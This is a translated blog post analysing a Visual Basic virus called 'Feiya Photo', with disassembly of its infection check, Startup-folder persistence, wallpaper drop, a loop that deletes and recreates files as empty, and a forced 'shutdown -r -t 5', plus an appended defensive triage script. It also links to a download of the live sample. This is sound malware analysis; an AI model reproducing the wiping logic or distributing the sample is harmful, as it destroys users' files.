A simple analysis of the "妃雅照片" (Feiya Photo) virus

The picture above shows the effect after infection; the key parts have been blurred. If you want the high-resolution picture, click here to download the virus sample and test it (run it in a virtual machine; if something goes wrong, don't come to me. hoho 🙂).

The picture above shows all the files in the virus package; just don't run that "电子照.exe". One more note: the Pic.dll file is actually an image. Change its extension to jpeg and you'll find that this "dll" is the desktop background the virus sets after it triggers. If you're only testing the virus to get that picture, you can stop here 😉.

The picture above shows another symptom after the virus triggers: the size of every file becomes 0. Unfortunately I have to tell you that this virus deletes the original files outright and does not merely hide them, so for the comrades who got infected the data is sadly gone. If you're lucky you can try EaseUS Data Recovery Wizard (易我数据恢复向导; I remember this site has a download link, search for it yourself) or another data recovery tool to attempt a recovery, but the odds of success look very, very small. If you only want to know how your data disappeared and whether it can come back, you can stop reading here; if you want a more detailed explanation, read on 😀. One more thing: if a hard-disk partition's drive letter comes after the optical drive, its files are not touched; for example, if the optical drive is D, files on the drives after D will not be deleted (files on the system drive are not affected either).

The picture above is the virus's running interface; the girl is actually rather pretty. The virus does not trigger while it is running, but once you click the "关" (Close) button on the interface, you're really done for. If you ran it by accident, you can kill it with Task Manager. And once it has run to completion, running it again goes straight to the shutdown dialog. Pretty nasty, anyway 😎.

Although the virus prompts for a shutdown, you'll find that the first time after infection the computer does not actually shut down, haha. After infection, running that e-book goes straight to the shutdown prompt; you can't view it anymore. Frustrating, right? Actually removing the virus is quite simple: it has only one executable, and after infection it can be found in the current user's Startup folder; kill it with a third-party process manager and delete it. Unfortunately, though, your files have gone to meet their maker and won't be coming back. :8

Finally it's code time. Let's look at the first part: how does the program know whether the machine is already infected? The check is fairly simple:

00463E60    55              push ebp                                 ; run-count check: is this the first run? The first time always seems to matter.
00463E61    8BEC            mov ebp,esp
00463E63    83EC 18         sub esp,0x18
00463E66    68 46144000     push 
00463EDB    C745 FC 0400000>mov dword ptr ss:[ebp-0x4],0x4
00463EE2    FF15 58104000   call dword ptr ds:[< &MSVBVM60.#598>]     ; MSVBVM60.rtcDoEvents
00463EE8    C745 FC 0500000>mov dword ptr ss:[ebp-0x4],0x5
00463EEF    C745 AC 0C27460>mov dword ptr ss:[ebp-0x54],电子照.00462>; UNICODE "WinDir"
00463EF6    C745 A4 0800000>mov dword ptr ss:[ebp-0x5C],0x8
00463EFD    8D55 A4         lea edx,dword ptr ss:[ebp-0x5C]
00463F00    8D4D B4         lea ecx,dword ptr ss:[ebp-0x4C]
00463F03    FF15 EC104000   call dword ptr ds:[< &MSVBVM60.__vbaVarDu>; MSVBVM60.__vbaVarDup
00463F09    8D45 B4         lea eax,dword ptr ss:[ebp-0x4C]
00463F0C    50              push eax
00463F0D    FF15 40104000   call dword ptr ds:[< &MSVBVM60.#667>]     ; MSVBVM60.rtcEnvironBstr
00463F13    8BD0            mov edx,eax
00463F15    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
00463F18    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
00463F1E    50              push eax
00463F1F    68 20274600     push 电子照.00462720                     ; UNICODE "\system32\taskmgr.exe"
00463F24    FF15 2C104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCa>; MSVBVM60.__vbaStrCat
00463F2A    8BD0            mov edx,eax
00463F2C    8D4D C8         lea ecx,dword ptr ss:[ebp-0x38]
00463F2F    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
00463F35    50              push eax
00463F36    6A 01           push 0x1
00463F38    6A FF           push -0x1
00463F3A    6A 20           push 0x20
00463F3C    FF15 B8104000   call dword ptr ds:[< &MSVBVM60.__vbaFileO>; MSVBVM60.__vbaFileOpen
00463F42    8D4D C8         lea ecx,dword ptr ss:[ebp-0x38]
00463F45    51              push ecx
00463F46    8D55 CC         lea edx,dword ptr ss:[ebp-0x34]
00463F49    52              push edx
00463F4A    6A 02           push 0x2
00463F4C    FF15 D0104000   call dword ptr ds:[< &MSVBVM60.__vbaFreeS>; MSVBVM60.__vbaFreeStrList
00463F52    83C4 0C         add esp,0xC
00463F55    8D4D B4         lea ecx,dword ptr ss:[ebp-0x4C]
00463F58    FF15 10104000   call dword ptr ds:[< &MSVBVM60.__vbaFreeV>; MSVBVM60.__vbaFreeVar
00463F5E    C745 FC 0600000>mov dword ptr ss:[ebp-0x4],0x6
00463F65    C745 AC 5027460>mov dword ptr ss:[ebp-0x54],电子照.00462>; UNICODE "C:\Pic.dll"
00463F6C    C745 A4 0800000>mov dword ptr ss:[ebp-0x5C],0x8
00463F73    8D55 A4         lea edx,dword ptr ss:[ebp-0x5C]
00463F76    8D4D B4         lea ecx,dword ptr ss:[ebp-0x4C]
00463F79    FF15 EC104000   call dword ptr ds:[< &MSVBVM60.__vbaVarDu>; MSVBVM60.__vbaVarDup
00463F7F    6A 00           push 0x0
00463F81    8D45 B4         lea eax,dword ptr ss:[ebp-0x4C]
00463F84    50              push eax
00463F85    FF15 B0104000   call dword ptr ds:[< &MSVBVM60.#645>]     ; MSVBVM60.rtcDir
00463F8B    8BD0            mov edx,eax
00463F8D    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
00463F90    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
00463F96    50              push eax
00463F97    68 6C274600     push 电子照.0046276C
00463F9C    FF15 6C104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCm>; MSVBVM60.__vbaStrCmp
00463FA2    F7D8            neg eax
00463FA4    1BC0            sbb eax,eax
00463FA6    F7D8            neg eax
00463FA8    F7D8            neg eax
00463FAA    66:8945 84      mov word ptr ss:[ebp-0x7C],ax
00463FAE    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
00463FB1    FF15 20114000   call dword ptr ds:[< &MSVBVM60.__vbaFreeS>; MSVBVM60.__vbaFreeStr
00463FB7    8D4D B4         lea ecx,dword ptr ss:[ebp-0x4C]
00463FBA    FF15 10104000   call dword ptr ds:[< &MSVBVM60.__vbaFreeV>; MSVBVM60.__vbaFreeVar
00463FC0    0FBF4D 84       movsx ecx,word ptr ss:[ebp-0x7C]
00463FC4    85C9            test ecx,ecx
00463FC6    0F84 8E010000   je 电子照.0046415A                       ; if Pic.dll is found, no jump: go straight into the shutdown flow
00464020    BA 50274600     mov edx,电子照.00462750                  ; UNICODE "C:\Pic.dll"
00464025    8B4D 08         mov ecx,dword ptr ss:[ebp+0x8]
00464028    83C1 38         add ecx,0x38
0046402B    FF15 CC104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCo>; MSVBVM60.__vbaStrCopy
00464031    C745 FC 0900000>mov dword ptr ss:[ebp-0x4],0x9
00464038    6A 01           push 0x1
0046403A    8B4D 08         mov ecx,dword ptr ss:[ebp+0x8]
0046403D    8B51 38         mov edx,dword ptr ds:[ecx+0x38]
00464040    52              push edx
00464041    8D45 CC         lea eax,dword ptr ss:[ebp-0x34]
00464044    50              push eax
00464045    FF15 F0104000   call dword ptr ds:[< &MSVBVM60.__vbaStrTo>; MSVBVM60.__vbaStrToAnsi
0046404B    50              push eax
0046404C    8D4D D0         lea ecx,dword ptr ss:[ebp-0x30]
0046404F    51              push ecx
00464050    FF15 E8104000   call dword ptr ds:[< &MSVBVM60.__vbaI4Var>; MSVBVM60.__vbaI4Var
00464056    50              push eax
00464057    6A 14           push 0x14
00464059    E8 5AE6FFFF     call 电子照.004626B8
0046405E    8945 90         mov dword ptr ss:[ebp-0x70],eax
00464061    FF15 30104000   call dword ptr ds:[< &MSVBVM60.__vbaSetSy>; MSVBVM60.__vbaSetSystemError
00464067    8B55 CC         mov edx,dword ptr ss:[ebp-0x34]
0046406A    52              push edx
0046406B    8B45 08         mov eax,dword ptr ss:[ebp+0x8]
0046406E    83C0 38         add eax,0x38
00464071    50              push eax
00464072    FF15 90104000   call dword ptr ds:[< &MSVBVM60.__vbaStrTo>; MSVBVM60.__vbaStrToUnicode
00464078    8B4D 08         mov ecx,dword ptr ss:[ebp+0x8]
0046407B    8B55 90         mov edx,dword ptr ss:[ebp-0x70]
0046407E    8951 34         mov dword ptr ds:[ecx+0x34],edx
00464081    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
00464084    FF15 20114000   call dword ptr ds:[< &MSVBVM60.__vbaFreeS>; MSVBVM60.__vbaFreeStr
0046408A    C745 FC 0A00000>mov dword ptr ss:[ebp-0x4],0xA           ; invoke the shutdown code
00464091    C745 AC 7427460>mov dword ptr ss:[ebp-0x54],电子照.00462>; UNICODE "shutdown -r -t 5"
00464098    C745 A4 0800000>mov dword ptr ss:[ebp-0x5C],0x8
0046409F    8D55 A4         lea edx,dword ptr ss:[ebp-0x5C]
004640A2    8D4D B4         lea ecx,dword ptr ss:[ebp-0x4C]
004640A5    FF15 EC104000   call dword ptr ds:[< &MSVBVM60.__vbaVarDu>; MSVBVM60.__vbaVarDup
0046415A    C745 F0 0000000>mov dword ptr ss:[ebp-0x10],0x0 ; jump here if the file does not exist
00464161    9B              wait
00464162    68 99414600     push 电子照.00464199
00464167    EB 26           jmp short 电子照.0046418F ; part of the code removed here, too long

The dirty work the virus does on its way out, hoho:

00467925    51              push ecx
00467926    68 34294600     push 电子照.00462934
0046792B    FF15 2C104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCa>; MSVBVM60.__vbaStrCat
00467931    8BD0            mov edx,eax
00467933    8D4D C8         lea ecx,dword ptr ss:[ebp-0x38]
00467936    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
0046793C    50              push eax
0046793D    FF15 D4104000   call dword ptr ds:[< &MSVBVM60.#576>]     ; MSVBVM60.rtcFileCopy
00467943    8D55 C4         lea edx,dword ptr ss:[ebp-0x3C]          ; copy the program into the user's Startup folder
00467946    52              push edx
00467947    8D45 C8         lea eax,dword ptr ss:[ebp-0x38]
0046794A    50              push eax
0046794B    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]

00467A6F    68 50274600     push 电子照.00462750                        ; UNICODE "C:\Pic.dll"
00467A74    8B55 CC         mov edx,dword ptr ss:[ebp-0x34]
00467A77    52              push edx
00467A78    68 C0294600     push 电子照.004629C0                        ; UNICODE "\Pic.dll"
00467A7D    FF15 2C104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCa>; MSVBVM60.__vbaStrCat
00467A83    8BD0            mov edx,eax
00467A85    8D4D C8         lea ecx,dword ptr ss:[ebp-0x38]
00467A88    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
00467A8E    50              push eax
00467A8F    FF15 D4104000   call dword ptr ds:[< &MSVBVM60.#576>]     ; MSVBVM60.rtcFileCopy
00467A95    8D45 C8         lea eax,dword ptr ss:[ebp-0x38]          ; copy Pic.dll to the root of the system drive
00467A98    50              push eax
00467A99    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]

00464762    6A 01           push 0x1
00464764    68 C8274600     push 电子照.004627C8                        ; GetFolder: get the folder
00464769    8D95 3CFFFFFF   lea edx,dword ptr ss:[ebp-0xC4]
0046476F    52              push edx
00464770    8D85 CCFEFFFF   lea eax,dword ptr ss:[ebp-0x134]
00464776    50              push eax
00464777    FF15 F4104000   call dword ptr ds:[< &MSVBVM60.__vbaVarLa>; MSVBVM60.__vbaVarLateMemCallLd
0046477D    83C4 20         add esp,0x20
00464780    50              push eax
00464781    8D4D 8C         lea ecx,dword ptr ss:[ebp-0x74]
00464784    51              push ecx
00464785    FF15 E4104000   call dword ptr ds:[< &MSVBVM60.__vbaVarSe>; MSVBVM60.__vbaVarSetVar
0046478B    C745 FC 0400000>mov dword ptr ss:[ebp-0x4],0x4
00464792    6A 00           push 0x0
00464794    68 DC274600     push 电子照.004627DC                        ; Files: enumerate the files
00464799    8D55 8C         lea edx,dword ptr ss:[ebp-0x74]
0046479C    52              push edx
0046479D    8D85 CCFEFFFF   lea eax,dword ptr ss:[ebp-0x134]

00464829    FF15 70104000   call dword ptr ds:[< &MSVBVM60.#529>]                 ; MSVBVM60.rtcKillFiles
0046482F    C745 FC 0800000>mov dword ptr ss:[ebp-0x4],0x8
00464836    8D45 BC         lea eax,dword ptr ss:[ebp-0x44]
00464839    8985 B4FEFFFF   mov dword ptr ss:[ebp-0x14C],eax
0046483F    C785 ACFEFFFF 0>mov dword ptr ss:[ebp-0x154],0x4008
00464849    C785 A4FEFFFF F>mov dword ptr ss:[ebp-0x15C],-0x1


00464690    55              push ebp ; file and folder deletion function
00464691    8BEC            mov ebp,esp
00464693    83EC 18         sub esp,0x18
00464696    68 46144000     push 
0046469B    64:A1 00000000  mov eax,dword ptr fs:[0]
004646A1    50              push eax
004646A2    64:8925 0000000>mov dword ptr fs:[0],esp
004646A9    B8 A4040000     mov eax,0x4A4
004646AE    E8 8DCDF9FF     call 
004646B3    53              push ebx
004646B4    56              push esi
004646B5    57              push edi
004646B6    8965 E8         mov dword ptr ss:[ebp-0x18],esp
004646B9    C745 EC A011400>mov dword ptr ss:[ebp-0x14],电子照.004011>; /
004646C0    C745 F0 0000000>mov dword ptr ss:[ebp-0x10],0x0
004646C7    C745 F4 0000000>mov dword ptr ss:[ebp-0xC],0x0
004646CE    8B45 08         mov eax,dword ptr ss:[ebp+0x8]
004646D1    8B08            mov ecx,dword ptr ds:[eax]
004646D3    8B55 08         mov edx,dword ptr ss:[ebp+0x8]
004646D6    52              push edx
004646D7    FF51 04         call dword ptr ds:[ecx+0x4]
004646DA    C745 FC 0100000>mov dword ptr ss:[ebp-0x4],0x1
004646E1    8B45 10         mov eax,dword ptr ss:[ebp+0x10]
004646E4    C700 00000000   mov dword ptr ds:[eax],0x0
004646EA    C745 FC 0200000>mov dword ptr ss:[ebp-0x4],0x2
004646F1    6A 00           push 0x0
004646F3    68 30284600     push 电子照.00462830                      ; (Initial CPU selection)
004646F8    8D8D CCFEFFFF   lea ecx,dword ptr ss:[ebp-0x134]
004646FE    51              push ecx
004646FF    FF15 A0104000   call dword ptr ds:[< &MSVBVM60.#716>]   ; MSVBVM60.rtcCreateObject2
00464705    8D95 CCFEFFFF   lea edx,dword ptr ss:[ebp-0x134]
0046470B    52              push edx
0046470C    8D85 3CFFFFFF   lea eax,dword ptr ss:[ebp-0xC4]
00464712    50              push eax
00464713    FF15 E4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarSetVar
00464719    C745 FC 0300000>mov dword ptr ss:[ebp-0x4],0x3
00464720    8B4D 0C         mov ecx,dword ptr ss:[ebp+0xC]
00464723    898D B4FEFFFF   mov dword ptr ss:[ebp-0x14C],ecx
00464729    C785 ACFEFFFF 0>mov dword ptr ss:[ebp-0x154],0x4008
00464733    B8 10000000     mov eax,0x10
00464738    E8 03CDF9FF     call 
0046473D    8BD4            mov edx,esp
0046473F    8B85 ACFEFFFF   mov eax,dword ptr ss:[ebp-0x154]
00464745    8902            mov dword ptr ds:[edx],eax
00464747    8B8D B0FEFFFF   mov ecx,dword ptr ss:[ebp-0x150]
0046474D    894A 04         mov dword ptr ds:[edx+0x4],ecx
00464750    8B85 B4FEFFFF   mov eax,dword ptr ss:[ebp-0x14C]
00464756    8942 08         mov dword ptr ds:[edx+0x8],eax
00464759    8B8D B8FEFFFF   mov ecx,dword ptr ss:[ebp-0x148]
0046475F    894A 0C         mov dword ptr ds:[edx+0xC],ecx
00464762    6A 01           push 0x1
00464764    68 C8274600     push 电子照.004627C8                      ; GetFolder: get the folder
00464769    8D95 3CFFFFFF   lea edx,dword ptr ss:[ebp-0xC4]
0046476F    52              push edx
00464770    8D85 CCFEFFFF   lea eax,dword ptr ss:[ebp-0x134]
00464776    50              push eax
00464777    FF15 F4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarLateMemCallLd
0046477D    83C4 20         add esp,0x20
00464780    50              push eax
00464781    8D4D 8C         lea ecx,dword ptr ss:[ebp-0x74]
00464784    51              push ecx
00464785    FF15 E4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarSetVar
0046478B    C745 FC 0400000>mov dword ptr ss:[ebp-0x4],0x4
00464792    6A 00           push 0x0
00464794    68 DC274600     push 电子照.004627DC                      ; Files: enumerate the files
00464799    8D55 8C         lea edx,dword ptr ss:[ebp-0x74]
0046479C    52              push edx
0046479D    8D85 CCFEFFFF   lea eax,dword ptr ss:[ebp-0x134]
004647A3    50              push eax
004647A4    FF15 F4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarLateMemCallLd
004647AA    83C4 10         add esp,0x10
004647AD    8BD0            mov edx,eax
004647AF    8D8D 20FEFFFF   lea ecx,dword ptr ss:[ebp-0x1E0]
004647B5    FF15 60104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarZero
004647BB    8D8D 20FEFFFF   lea ecx,dword ptr ss:[ebp-0x1E0]
004647C1    51              push ecx
004647C2    8D55 9C         lea edx,dword ptr ss:[ebp-0x64]
004647C5    52              push edx
004647C6    8D85 88FEFFFF   lea eax,dword ptr ss:[ebp-0x178]
004647CC    50              push eax
004647CD    8D8D 60FCFFFF   lea ecx,dword ptr ss:[ebp-0x3A0]
004647D3    51              push ecx
004647D4    8D95 5CFCFFFF   lea edx,dword ptr ss:[ebp-0x3A4]
004647DA    52              push edx
004647DB    8D85 BCFCFFFF   lea eax,dword ptr ss:[ebp-0x344]
004647E1    50              push eax
004647E2    FF15 04114000   call dword ptr ds:[< &MSVBVM60.__vbaFor>; MSVBVM60.__vbaForEachVar
004647E8    8985 94FBFFFF   mov dword ptr ss:[ebp-0x46C],eax
004647EE    E9 47010000     jmp 电子照.0046493A
004647F3    C745 FC 0500000>mov dword ptr ss:[ebp-0x4],0x5         ; loop deleting files
004647FA    6A FF           push -0x1
004647FC    FF15 48104000   call dword ptr ds:[< &MSVBVM60.__vbaOnE>; MSVBVM60.__vbaOnError
00464802    C745 FC 0600000>mov dword ptr ss:[ebp-0x4],0x6
00464809    8D4D 9C         lea ecx,dword ptr ss:[ebp-0x64]
0046480C    51              push ecx
0046480D    FF15 08114000   call dword ptr ds:[< &MSVBVM60.__vbaStr>; MSVBVM60.__vbaStrVarCopy
00464813    8BD0            mov edx,eax
00464815    8D4D BC         lea ecx,dword ptr ss:[ebp-0x44]
00464818    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStr>; MSVBVM60.__vbaStrMove
0046481E    C745 FC 0700000>mov dword ptr ss:[ebp-0x4],0x7
00464825    8D55 9C         lea edx,dword ptr ss:[ebp-0x64]
00464828    52              push edx
00464829    FF15 70104000   call dword ptr ds:[< &MSVBVM60.#529>]   ; MSVBVM60.rtcKillFiles
0046482F    C745 FC 0800000>mov dword ptr ss:[ebp-0x4],0x8         ; delete the file outright via rtcKillFiles, brutal~
00464836    8D45 BC         lea eax,dword ptr ss:[ebp-0x44]
00464839    8985 B4FEFFFF   mov dword ptr ss:[ebp-0x14C],eax
0046483F    C785 ACFEFFFF 0>mov dword ptr ss:[ebp-0x154],0x4008
00464849    C785 A4FEFFFF F>mov dword ptr ss:[ebp-0x15C],-0x1
00464853    C785 9CFEFFFF 0>mov dword ptr ss:[ebp-0x164],0xB
0046485D    6A 00           push 0x0
0046485F    68 6C284600     push 电子照.0046286C                      ; Scripting.FileSystemObject
00464864    8D8D CCFEFFFF   lea ecx,dword ptr ss:[ebp-0x134]
0046486A    51              push ecx
0046486B    FF15 A0104000   call dword ptr ds:[< &MSVBVM60.#716>]   ; MSVBVM60.rtcCreateObject2
00464871    B8 10000000     mov eax,0x10
00464876    E8 C5CBF9FF     call 
0046487B    8BD4            mov edx,esp
0046487D    8B85 ACFEFFFF   mov eax,dword ptr ss:[ebp-0x154]
00464883    8902            mov dword ptr ds:[edx],eax
00464885    8B8D B0FEFFFF   mov ecx,dword ptr ss:[ebp-0x150]
0046488B    894A 04         mov dword ptr ds:[edx+0x4],ecx
0046488E    8B85 B4FEFFFF   mov eax,dword ptr ss:[ebp-0x14C]
00464894    8942 08         mov dword ptr ds:[edx+0x8],eax
00464897    8B8D B8FEFFFF   mov ecx,dword ptr ss:[ebp-0x148]
0046489D    894A 0C         mov dword ptr ds:[edx+0xC],ecx
004648A0    B8 10000000     mov eax,0x10
004648A5    E8 96CBF9FF     call 
004648AA    8BD4            mov edx,esp
004648AC    8B85 9CFEFFFF   mov eax,dword ptr ss:[ebp-0x164]
004648B2    8902            mov dword ptr ds:[edx],eax
004648B4    8B8D A0FEFFFF   mov ecx,dword ptr ss:[ebp-0x160]
004648BA    894A 04         mov dword ptr ds:[edx+0x4],ecx
004648BD    8B85 A4FEFFFF   mov eax,dword ptr ss:[ebp-0x15C]
004648C3    8942 08         mov dword ptr ds:[edx+0x8],eax
004648C6    8B8D A8FEFFFF   mov ecx,dword ptr ss:[ebp-0x158]
004648CC    894A 0C         mov dword ptr ds:[edx+0xC],ecx
004648CF    6A 02           push 0x2
004648D1    68 A4284600     push 电子照.004628A4                      ; CreateTextFile
004648D6    8D95 CCFEFFFF   lea edx,dword ptr ss:[ebp-0x134]          ; recreate the deleted file (as an empty text file)
004648DC    52              push edx
004648DD    8D85 BCFEFFFF   lea eax,dword ptr ss:[ebp-0x144]
004648E3    50              push eax
004648E4    FF15 F4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarLateMemCallLd
004648EA    83C4 30         add esp,0x30
004648ED    50              push eax
004648EE    8D8D 0CFFFFFF   lea ecx,dword ptr ss:[ebp-0xF4]
004648F4    51              push ecx
004648F5    FF15 E4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarSetVar
004648FB    8D8D CCFEFFFF   lea ecx,dword ptr ss:[ebp-0x134]
00464901    FF15 10104000   call dword ptr ds:[< &MSVBVM60.__vbaFre>; MSVBVM60.__vbaFreeVar
00464907    C745 FC 0900000>mov dword ptr ss:[ebp-0x4],0x9
0046490E    8D55 9C         lea edx,dword ptr ss:[ebp-0x64]
00464911    52              push edx
00464912    8D85 88FEFFFF   lea eax,dword ptr ss:[ebp-0x178]
00464918    50              push eax
00464919    8D8D 60FCFFFF   lea ecx,dword ptr ss:[ebp-0x3A0]
0046491F    51              push ecx
00464920    8D95 5CFCFFFF   lea edx,dword ptr ss:[ebp-0x3A4]
00464926    52              push edx
00464927    8D85 BCFCFFFF   lea eax,dword ptr ss:[ebp-0x344]
0046492D    50              push eax
0046492E    FF15 20104000   call dword ptr ds:[< &MSVBVM60.__vbaNex>; MSVBVM60.__vbaNextEachVar
00464934    8985 94FBFFFF   mov dword ptr ss:[ebp-0x46C],eax
0046493A    83BD 94FBFFFF 0>cmp dword ptr ss:[ebp-0x46C],0x0
00464941  ^ 0F85 ACFEFFFF   jnz 电子照.004647F3                       ; loop deleting files


00467C90    8D4D B0         lea ecx,dword ptr ss:[ebp-0x50]
00467C93    FF15 10104000   call dword ptr ds:[< &MSVBVM60.__vbaFreeV>; MSVBVM60.__vbaFreeVar
00467C99    C745 FC 0C00000>mov dword ptr ss:[ebp-0x4],0xC
00467CA0    BA 50274600     mov edx,电子照.00462750                     ; UNICODE "C:\Pic.dll"
00467CA5    8B4D 08         mov ecx,dword ptr ss:[ebp+0x8]
00467CA8    83C1 38         add ecx,0x38
00467CAB    FF15 CC104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCo>; MSVBVM60.__vbaStrCopy
00467CB1    C745 FC 0D00000>mov dword ptr ss:[ebp-0x4],0xD
00467CB8    6A 01           push 0x1
00467CBA    8B45 08         mov eax,dword ptr ss:[ebp+0x8]
00467CBD    8B48 38         mov ecx,dword ptr ds:[eax+0x38]
00467CC0    51              push ecx
00467CC1    8D55 CC         lea edx,dword ptr ss:[ebp-0x34]
00467CC4    52              push edx
00467CC5    FF15 F0104000   call dword ptr ds:[< &MSVBVM60.__vbaStrTo>; MSVBVM60.__vbaStrToAnsi
00467CCB    50              push eax
00467CCC    8D45 D0         lea eax,dword ptr ss:[ebp-0x30]
00467CCF    50              push eax
00467CD0    FF15 E8104000   call dword ptr ds:[< &MSVBVM60.__vbaI4Var>; MSVBVM60.__vbaI4Var
00467CD6    50              push eax
00467CD7    6A 14           push 0x14
00467CD9    E8 DAA9FFFF     call 电子照.004626B8                        ; set the desktop wallpaper
00467CDE    8985 6CFFFFFF   mov dword ptr ss:[ebp-0x94],eax
00467CE4    FF15 30104000   call dword ptr ds:[< &MSVBVM60.__vbaSetSy>; MSVBVM60.__vbaSetSystemError
00467CEA    8B4D CC         mov ecx,dword ptr ss:[ebp-0x34]
00467CED    51              push ecx
00467CEE    8B55 08         mov edx,dword ptr ss:[ebp+0x8]
00467CF1    83C2 38         add edx,0x38
00467CF4    52              push edx
00467CF5    FF15 90104000   call dword ptr ds:[< &MSVBVM60.__vbaStrTo>; MSVBVM60.__vbaStrToUnicode
00467CFB    8B45 08         mov eax,dword ptr ss:[ebp+0x8]
00467CFE    8B8D 6CFFFFFF   mov ecx,dword ptr ss:[ebp-0x94]
00467D04    8948 34         mov dword ptr ds:[eax+0x34],ecx
00467D07    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
00467D0A    FF15 20114000   call dword ptr ds:[< &MSVBVM60.__vbaFreeS>; MSVBVM60.__vbaFreeStr
00467D10    C745 FC 0E00000>mov dword ptr ss:[ebp-0x4],0xE
00467D17    C745 88 7427460>mov dword ptr ss:[ebp-0x78],电子照.00462774 ; UNICODE "shutdown -r -t 5"
00467D1E    C745 80 0800000>mov dword ptr ss:[ebp-0x80],0x8          ; shutdown code
00467D25    8D55 80         lea edx,dword ptr ss:[ebp-0x80]
00467D28    8D4D B0         lea ecx,dword ptr ss:[ebp-0x50]
00467D2B    FF15 EC104000   call dword ptr ds:[< &MSVBVM60.__vbaVarDu>; MSVBVM60.__vbaVarDup
00467D31    6A 02           push 0x2
00467D33    8D55 B0         lea edx,dword ptr ss:[ebp-0x50]
00467D36    52              push edx
00467D37    FF15 80104000   call dword ptr ds:[< &MSVBVM60.#600>]     ; MSVBVM60.rtcShell
00467D3D    DD9D 64FFFFFF   fstp qword ptr ss:[ebp-0x9C]             ; shut down the computer
00467D43    8D4D B0         lea ecx,dword ptr ss:[ebp-0x50]
00467D46    FF15 10104000   call dword ptr ds:[< &MSVBVM60.__vbaFreeV>; MSVBVM60.__vbaFreeVar
00467D4C    C745 FC 0F00000>mov dword ptr ss:[ebp-0x4],0xF
00467D53    833D 48934600 0>cmp dword ptr ds:[0x469348],0x0
00467D5A    75 1C           jnz short 电子照.00467D78
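
As an added defender-side example (not part of the original post and not the virus's own code), the Python script below turns the three behaviours traced in the disassembly into a triage check: the C:\Pic.dll marker that is really a JPEG, the executable copied to the user's Startup folder, and the dense run of zero-byte files left behind by Kill followed by CreateTextFile. The sample tree it builds is constructed for the demo; the Startup folder path and the file names are assumptions.

```python
import os
import tempfile
from pathlib import Path

JPEG_MAGIC = b"\xff\xd8\xff"  # every JPEG/JFIF file starts with these bytes


def is_jpeg_disguised(path):
    """True if the file starts with JPEG magic bytes, whatever its extension
    (the Pic.dll file is really the wallpaper image)."""
    p = Path(path)
    if not p.is_file():
        return False
    with p.open("rb") as fh:
        return fh.read(len(JPEG_MAGIC)) == JPEG_MAGIC


def zero_byte_clusters(root, window=5.0, min_run=3):
    """Collect zero-byte files under root and group them by modification time.
    Kill + CreateTextFile recreates whole folders within seconds, so wiped
    files show up as a dense run of empty files with near-identical
    timestamps, while ordinary empty files are scattered in time."""
    stamps = sorted(
        (os.stat(os.path.join(d, n)).st_mtime, os.path.join(d, n))
        for d, _, names in os.walk(root) for n in names
        if os.stat(os.path.join(d, n)).st_size == 0)
    clusters, run = [], []
    for mtime, path in stamps:
        if run and mtime - run[-1][0] > window:
            if len(run) >= min_run:
                clusters.append([p for _, p in run])
            run = []
        run.append((mtime, path))
    if len(run) >= min_run:
        clusters.append([p for _, p in run])
    return clusters


def startup_executables(startup_dir):
    """Executables sitting in the per-user Startup folder (persistence)."""
    p = Path(startup_dir)
    if not p.is_dir():
        return []
    return sorted(f.name for f in p.iterdir() if f.suffix.lower() == ".exe")


def triage(system_root, startup_dir, data_root):
    """Combine the three indicators from the analysis into one report."""
    marker = Path(system_root) / "Pic.dll"
    return {
        "marker_present": marker.is_file(),
        "marker_is_jpeg": is_jpeg_disguised(marker),
        "startup_exes": startup_executables(startup_dir),
        "wiped_clusters": zero_byte_clusters(data_root),
    }


def build_sample():
    """Constructed, offline stand-in for an infected machine (not real data)."""
    root = Path(tempfile.mkdtemp())
    (root / "Pic.dll").write_bytes(JPEG_MAGIC + b"\xe0" + b"\x00" * 32)
    (root / "Startup").mkdir()
    (root / "Startup" / "sample.exe").write_bytes(b"MZ")  # hypothetical name
    docs = root / "docs"
    docs.mkdir()
    for name in ("a.doc", "b.xls", "c.jpg", "d.txt"):  # wiped in one pass
        (docs / name).write_bytes(b"")
        os.utime(docs / name, (1_290_000_000, 1_290_000_000))
    (docs / "untouched.txt").write_bytes(b"still here")
    (docs / "old_empty.log").write_bytes(b"")  # lone empty file, much older
    os.utime(docs / "old_empty.log", (1_280_000_000, 1_280_000_000))
    return str(root), str(root / "Startup"), str(docs)


if __name__ == "__main__":
    print(triage(*build_sample()))
```

On a real machine you would point system_root at the system drive, startup_dir at the current user's Startup folder and data_root at the data partitions; the timestamp window is the knob to tune if the recreate loop ran slowly.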

PS: A pointless remark: people who like looking at dirty pictures and little movies should be careful, don't let it cost you more than it's worth.

Original article; when reposting please credit: reposted from obaby@mars

Permalink: https://h4ck.org.cn/2010/11/photo-virus-anylist/
